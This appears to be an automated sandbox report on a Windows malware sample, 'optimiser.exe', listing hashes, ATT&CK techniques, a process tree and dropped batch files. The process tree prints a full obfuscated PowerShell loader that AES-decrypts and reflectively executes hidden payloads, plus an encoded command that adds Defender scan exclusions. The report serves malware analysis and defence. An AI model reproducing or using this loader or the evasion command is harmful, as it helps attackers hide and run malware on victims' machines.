a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5

General

Target

optimiser.exe
Size

431KB
MD5

74cb80305f51ff0585928c12be72dddd
SHA1

727a72de8f439beebf028f21d3cb58f45f99e42a
SHA256

a94a79df8c332ae5de59b99853ae97dc8a1fc272818a146bd7ad1d5e295611c5
SHA512

21775770e10ae19302d198d7c48799bc510aee0c7e92563798ba151760181facc6ba9452400cde84e3018881ec1a54ac82d1fd9b587c4bc2305af3b5793cf178
SSDEEP

12288:9uBadWfqCQi/szyz7FaFAf69ffou1R1L:9iadWfEssOzZusmPR

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2816 powershell.exe
2472 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2816 powershell.exe
2472 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2816 powershell.exe
Token: SeDebugPrivilege 2472 powershell.exe

pid	process
2816	powershell.exe
2472	powershell.exe

pid	process
2816	powershell.exe
2472	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

optimiser.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2780 wrote to memory of 2816	2780	optimiser.exe	powershell.exe
PID 2780 wrote to memory of 2816	2780	optimiser.exe	powershell.exe
PID 2780 wrote to memory of 2816	2780	optimiser.exe	powershell.exe
PID 2780 wrote to memory of 2816	2780	optimiser.exe	powershell.exe
PID 2780 wrote to memory of 2532	2780	optimiser.exe	cmd.exe
PID 2780 wrote to memory of 2532	2780	optimiser.exe	cmd.exe
PID 2780 wrote to memory of 2532	2780	optimiser.exe	cmd.exe
PID 2780 wrote to memory of 2532	2780	optimiser.exe	cmd.exe
PID 2780 wrote to memory of 2340	2780	optimiser.exe	cmd.exe
PID 2780 wrote to memory of 2340	2780	optimiser.exe	cmd.exe
PID 2780 wrote to memory of 2340	2780	optimiser.exe	cmd.exe
PID 2780 wrote to memory of 2340	2780	optimiser.exe	cmd.exe
PID 2532 wrote to memory of 2608	2532	cmd.exe	mode.com
PID 2532 wrote to memory of 2608	2532	cmd.exe	mode.com
PID 2532 wrote to memory of 2608	2532	cmd.exe	mode.com
PID 2532 wrote to memory of 2608	2532	cmd.exe	mode.com
PID 2532 wrote to memory of 2596	2532	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2596	2532	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2596	2532	cmd.exe	cmd.exe
PID 2532 wrote to memory of 2596	2532	cmd.exe	cmd.exe
PID 2596 wrote to memory of 2356	2596	cmd.exe	findstr.exe
PID 2596 wrote to memory of 2356	2596	cmd.exe	findstr.exe
PID 2596 wrote to memory of 2356	2596	cmd.exe	findstr.exe
PID 2596 wrote to memory of 2356	2596	cmd.exe	findstr.exe
PID 2340 wrote to memory of 2360	2340	cmd.exe	cmd.exe
PID 2340 wrote to memory of 2360	2340	cmd.exe	cmd.exe
PID 2340 wrote to memory of 2360	2340	cmd.exe	cmd.exe
PID 2340 wrote to memory of 2360	2340	cmd.exe	cmd.exe
PID 2340 wrote to memory of 2472	2340	cmd.exe	powershell.exe
PID 2340 wrote to memory of 2472	2340	cmd.exe	powershell.exe
PID 2340 wrote to memory of 2472	2340	cmd.exe	powershell.exe
PID 2340 wrote to memory of 2472	2340	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\optimiser.exe
"C:\Users\Admin\AppData\Local\Temp\optimiser.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAaAB1ACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Windows\SysWOW64\mode.com
mode 800
3⤵
PID:2608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:2596

C:\Windows\SysWOW64\findstr.exe
findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat"
4⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sdsd.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:2360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ExclusiveBatchTwo.bat
Filesize
27KB

MD5
d717847f40deba47954806864cbb41e6

SHA1
870ce3a8ccbf6c8ea6b1188592319f57e9fadc52

SHA256
4a389d61282947a697f5a2629c64248059eca904b266f08a64f76341c3967f8d

SHA512
91e1156c3bb9fb33f037cd7db01a64e92778561cb6ceec35a2eeac379d2d945e6636138a054503776803590429688f77d8219589a12c598c84625e18c21b33f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdsd.bat
Filesize
399KB

MD5
dedc70c320233bc67ceb02a9492f29d6

SHA1
d031a05a302501a50581a2338762013f60da62df

SHA256
c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a

SHA512
776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
cd6e2cbe6f94ad70b34ff53bb146c495

SHA1
77e1029bba13b99a029de06bc6f2674fde21c65d

SHA256
e049ac8e4dd31951d440adf5c7db6db780940d08b64b4db8ecf52c6a1abf94a1

SHA512
7013702cee01f012202b0757831ba9a87134929d9181edf3c73e76f0e3e62137d4efb1970fdf63b20e5664a5192c37d2f75d0a43d085f465c44c6b136f26569d

Download Submit

Analysis

Sharing